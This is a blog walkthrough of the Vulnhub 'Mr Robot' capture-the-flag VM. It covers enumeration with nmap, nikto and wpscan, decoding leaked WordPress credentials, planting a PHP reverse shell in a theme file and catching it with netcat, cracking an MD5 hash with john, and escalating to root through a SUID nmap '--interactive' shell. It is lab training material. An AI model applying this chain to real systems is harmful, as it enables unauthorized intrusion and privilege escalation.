Hello friend.

In celebration of Mr Robot Season 3 premiering tonight, today’s Vulnhub box will be “Mr Robot”!

For those who are just joining us, Vulnhub provides intentionally-vulnerable virtual machines to help anyone gain practical hands-on experience in information security and network administration. It’s great practice for working on penetrating vulnerable hosts. This host is themed after the hit hacker TV series of the same name.

From the description:

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

Sounds fun! Let’s get started.

Enumeration

You should know the drill by now. Our first volley is usually an nmap scan to see what we’re dealing with:

root@kali:~# nmap 192.168.128.140

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-11 10:57 CDT
Nmap scan report for 192.168.128.140
Host is up (0.00053s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 00:0C:29:72:C3:7A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 28.36 seconds

I browse to the webserver, and am greeted with a really awesome virtual terminal. It logs in to itself, and then displays the following message:

11:01 <mr. robot> Hello friend.  If you've come, you've come for a reason.  
You may not be able to explain it yet, but there's a part of you that's 
exhausted with this world... a world that decides where you work, who you 
see, and how you empty and fill your depressing bank account.  Even the 
Internet connection you are using to read this is costing you, slowly 
chipping away at your existence.  There are things you want to say.  
Soon I will give you a voice.  Today your education begins.  

Commands:
prepare
fsociety
inform
question
wakeup
join

root@fsociety:~#

Wow… Ok. Are there Agents coming for me? Do I need to slip out the window onto the scaffolding?

I try a few of the commands while I wait for nikto and dirb to complete. Most of them just display sloganry or images related to the show. Which is cool, but not helpful to our goal of rooting the box. At this stage I decide to continue enumerating the host rather than dive into analyzing this part of the app. There will be time for that later.

Next I check the ‘robots.txt’ file for the host:

root@kali:~# curl 'http://192.168.128.140/robots.txt'
User-agent: *
fsocity.dic
key-1-of-3.txt

There’s key number one!

root@kali:~# curl 'http://192.168.128.140/key-1-of-3.txt'
073403c8a58a1f80d943455fb30724b9

The fsocity.dic [sic] file is a dictionary file, which makes me suspect brute-forcing will be a component of this box.

By this time nikto has completed and reveals some interesting details:

root@kali:~# nikto -h 192.168.128.140
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.128.140
+ Target Hostname:    192.168.128.140
+ Target Port:        80
+ Start Time:         2017-10-10 19:45:44 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad 
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.128.140/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7536 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-10-10 19:51:13 (GMT-5) (329 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Neat. Some of these exposed dirs are not obviously helpful. See for example “/readme”:

root@kali:~# curl http://192.168.128.140/readme.html
I like where you head is at. However I'm not going to help you.

However, looking at /license:

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?


do you want a password or something?


ZWxsaW90OkVSMjgtMDY1Mgo=

A “script kitty”?! Now that’s below the belt. Anyway, the base64 decodes to what looks like a credential set:

root@kali:~# echo 'ZWxsaW90OkVSMjgtMDY1Mgo=' | base64 -d
elliot:ER28-0652

I can’t be sure but I will guess these may be credentials to the WordPress site.

I run WPScan against the site to test for vulnerabilities and while I attempt to log in with the discovered cred pair.

root@kali:~# wpscan --url http://192.168.128.140 --enumerate
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.128.140/
[+] Started: Tue Oct 10 18:31:01 2017

[...]

The discovered version of WordPress contains multiple vulnerabilities and the site is using many vulnerable plug-ins. This is irrelevant at this point to our goal, however, because we are able to sign into WordPress with elliot:ER28-0652!

Gaining a Foothold

Once authenticated to WordPress I upload a php reverse shell. I go to the Dashboard -> Appearance -> Editor. From here I can paste my code into any of the files. The first in the list is the default 404.php file, so it will be our victim today. I paste the code in, click “Update File”, and then simply browse to the resource with Firefox.

Then I catch my reverse shell with netcat:

root@kali:~# nc -lp 80
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 00:30:53 up  3:00,  0 users,  load average: 0.00, 0.01, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
daemon@linux:/$ 

That wasn’t so bad! Now to get the rest of the flags, and get to ROOT.

Privilege Escalation

I examine the filesystem and find a home directory for a user named “robot”

daemon@linux:/$ ls -l /home
ls -l /home
total 4
drwxr-xr-x 2 root root 4096 Nov 13  2015 robot

I explore the directory a little further and find some interesting files:

daemon@linux:/$ ls -la /home/robot
ls -la /home/robot
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

Hmm a raw-md5 hash?

daemon@linux:/$ cat /home/robot/password.raw-md5
cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

MD5 hashing algorithm has been found to have multiple vulnerabilities, so it should be easy to crack. Let’s try it with john:

root@kali:~# echo 'c3fcd3d76192e4007dfb496cca67e13b' > hash
root@kali:~# john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE2 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefghijklmnopqrstuvwxyz (?)
1g 0:00:00:00 DONE (2017-10-10 19:52) 16.66g/s 673400p/s 673400c/s 673400C/s abygail..TERRELL
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Excellent!

If you struggle with john like I did, there is always the ooooold obscure hacker trick called “Google” which will unmask many, many MD5s and other hashes.

I use the uncovered password to su to user “robot” and snag the key:

daemon@linux:/$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
$ cat /home/robot/key-2-of-3.txt
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959

Now let’s get some root.

Getting to root

I enumerate the filesystem some more, digging around for SUID files:

robot@linux:~$ find / -xdev -user root -perm -4000 -type f 2>/dev/null
find / -xdev -user root -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

Hmm, interesting. The nmap program is SUID root:

robot@linux:~$ ls -l /usr/local/bin/nmap
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap

Even worse, it is a grossly outdated version:

robot@linux:~$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )

Specifically, it is a grossly outdated version which supports the --interactive flag. This allows us to drop into a kind of “nmap shell”, which we can then pivot into a real command shell:

robot@linux:~$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Fantastic.

Final Thoughts

This was a really cool box and definitely got me into the mood to watch some Mr. Robot tonight!

The creators stated that there are multiple ways to own it, so this explains why some things (such as the brute force dict file) ended up not getting used. I can tell they put a lot of effort into this machine. I spent a little more time poking around the box after rooting it and can confirm there are other ways to get it. If you want to know more you’ll have to download it and find them for yourself. ;)

Thanks for reading, and stay tuned for some posts on some personal projects coming up in the VERY near future.

All the best,

EOF